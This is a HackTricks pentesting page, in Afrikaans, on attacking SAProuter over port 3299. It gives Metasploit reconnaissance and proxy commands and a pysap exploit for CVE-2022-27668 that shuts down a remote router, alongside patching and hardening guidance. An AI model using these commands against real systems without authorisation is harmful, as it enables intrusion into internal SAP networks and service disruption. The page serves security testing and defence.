HackTricks# 3299/tcp - Pentesting SAProuter
Reading time: 7 minutes
tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
Dit is 'n opsomming van die pos van https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/
Verstaan van SAProuter Penetrasie met Metasploit
SAProuter funksioneer as 'n omgekeerde proxy vir SAP-stelsels, hoofsaaklik om toegang tussen die internet en interne SAP-netwerke te beheer. Dit word algemeen aan die internet blootgestel deur TCP-poort 3299 deur organisatoriese vuurmure toe te laat. Hierdie opstelling maak SAProuter 'n aantreklike teiken vir pentesting omdat dit as 'n toegangspunt na hoëwaarde interne netwerke kan dien.
Skandering en Inligting Versameling
Aanvanklik word 'n skandering uitgevoer om te identifiseer of 'n SAP-router op 'n gegewe IP draai met behulp van die sap_service_discovery module. Hierdie stap is noodsaaklik om die teenwoordigheid van 'n SAP-router en sy oop poort te bevestig.
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
Na die ontdekking word verdere ondersoek na die SAP-router se konfigurasie gedoen met die sap_router_info_request module om moontlik interne netwerkbesonderhede te onthul.
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run
Opname van Interne Dienste
Met verkregen insigte in die interne netwerk, word die sap_router_portscanner module gebruik om interne gasheers en dienste deur die SAProuter te ondersoek, wat 'n dieper begrip van interne netwerke en dienskonfigurasies moontlik maak.
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
Die buigsaamheid van hierdie module om spesifieke SAP-instanties en poorte te teiken, maak dit 'n effektiewe hulpmiddel vir gedetailleerde interne netwerkverkenning.
Geavanceerde Enumerasie en ACL Kaartlegging
Verder skandering kan onthul hoe Toegangsbeheerlisensies (ACLs) op die SAProuter geconfigureer is, wat aandui watter verbindings toegelaat of geblokkeer word. Hierdie inligting is van kardinale belang om sekuriteitsbeleide en potensiële kwesbaarhede te verstaan.
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
Blind Enumeration van Interne Gashere
In scenario's waar direkte inligting van die SAProuter beperk is, kan tegnieke soos blind enumeration toegepas word. Hierdie benadering probeer om die bestaan van interne gasname te raai en te verifieer, wat potensiële teikens onthul sonder direkte IP-adresse.
Benutting van Inligting vir Penetrasietoetsing
Nadat die netwerk in kaart gebring is en toeganklike dienste geïdentifiseer is, kan penetrasietoetsers Metasploit se proxy vermoëns benut om deur die SAProuter te beweeg vir verdere verkenning en uitbuiting van interne SAP-dienste.
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run
Gevolgtrekking
Hierdie benadering beklemtoon die belangrikheid van veilige SAProuter-konfigurasies en lig die potensiaal uit om toegang tot interne netwerke te verkry deur teiken penetrasietoetsing. Dit is van kardinale belang om SAP-routers behoorlik te beveilig en hul rol in netwerkbeveiligingsargitektuur te verstaan om teen ongeoorloofde toegang te beskerm.
Vir meer gedetailleerde inligting oor Metasploit-modules en hul gebruik, besoek Rapid7's database.
Onlangse Kwesbaarhede (2022-2025)
CVE-2022-27668 – Onbehoorlike Toegangsbeheer ➜ Afgeleë Administratiewe Opdraguitvoering
In Junie 2022 het SAP Sekuriteitsnota 3158375 vrygestel wat 'n kritieke fout (CVSS 9.8) in SAProuter (alle kerne ≥ 7.22) aanspreek. 'n Ongeoutentiseerde aanvaller kan permissiewe saprouttab inskrywings misbruik om administrasie-pakkette (bv. shutdown, trace-level, connection-kill) vanaf 'n afgeleë gasheer te stuur, selfs wanneer die router sonder die -X remote-admin opsie begin is.
Die probleem spruit voort uit die moontlikheid om 'n tonnel na die router se eie loopback-interface te bou deur die ongespesifiseerde adres 0.0.0.0 te teiken. Sodra die tonnel gevestig is, verkry die aanvaller plaaslike-gasheer bevoegdhede en kan enige admin-opdrag uitvoer.
Praktiese uitbuiting kan herhaal word met die pysap raamwerk:
# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0 -r 3299 \
-a 127.0.0.1 -l 3299 -v
# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299
Geraakte weergawes
- Stand-alone SAProuter 7.22 / 7.53
- Kernel 7.49, 7.77, 7.81, 7.85–7.88 (insluitend KRNL64NUC/UC)
Regstelling / Versagting
- Pas die patch toe wat met SAP Nota 3158375 gelewer is.
- Verwyder wildcard (
*) teikens vanPenSlyne insaprouttab. - Maak seker dat die router sonder die
-Xopsie begin word en nie direk aan die Internet blootgestel word nie.
Opgedateerde Gereedskap & Truuks
- pysap – aktief onderhou en bied
router_portfw.py,router_admin.py&router_trace.pyaan vir die opstel van pasgemaakte NI/Router pakkette, fuzzing ACLs of die outomatisering van die CVE-2022-27668 exploit. - Nmap – brei diensdetectie uit deur die pasgemaakte SAProuter-probe by te voeg:
Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/
Kombineer met NSE-skripte of --script=banner om vinnig weergawes te identifiseer wat die banner string lek (SAProuter <ver> op '<host>').
- Metasploit – die bykomende modules hierbo werk steeds deur 'n SOCKS of NI-proxy wat met pysap geskep is, wat volle raamwerkintegrasie moontlik maak selfs wanneer die router direkte toegang blokkeer.
Versterking & Opsporing Kontrolelys
- Filter poort 3299/TCP op die perimeter-firewall – laat verkeer slegs toe van vertroude SAP-ondersteuningsnetwerke.
- Hou SAProuter volledig gepatch; verifieer met
saprouter -ven vergelyk teen die nuutste kernpatchvlak. - Gebruik strikte, gasheer-spesifieke inskrywings in
saprouttab; vermy*wildcards en weierP/Sreëls wat teikens op willekeurige gashere of poorte. - Begin die diens met
-S <secudir>+ SNC om versleuteling en wederkerige verifikasie af te dwing. - Deaktiveer afstandsadministrasie (
-X) en, indien moontlik, bind die luisteraar aan127.0.0.1terwyl 'n eksterne omgekeerde proxy vir vereiste verkeer gebruik word. - Monitor die dev_rout log vir verdagte
ROUTER_ADMpakkette of onverwagteNI_ROUTEversoeke na0.0.0.0.
Verwysings
- https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
- https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/
Shodan
port:3299 !HTTP Network packet too big
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.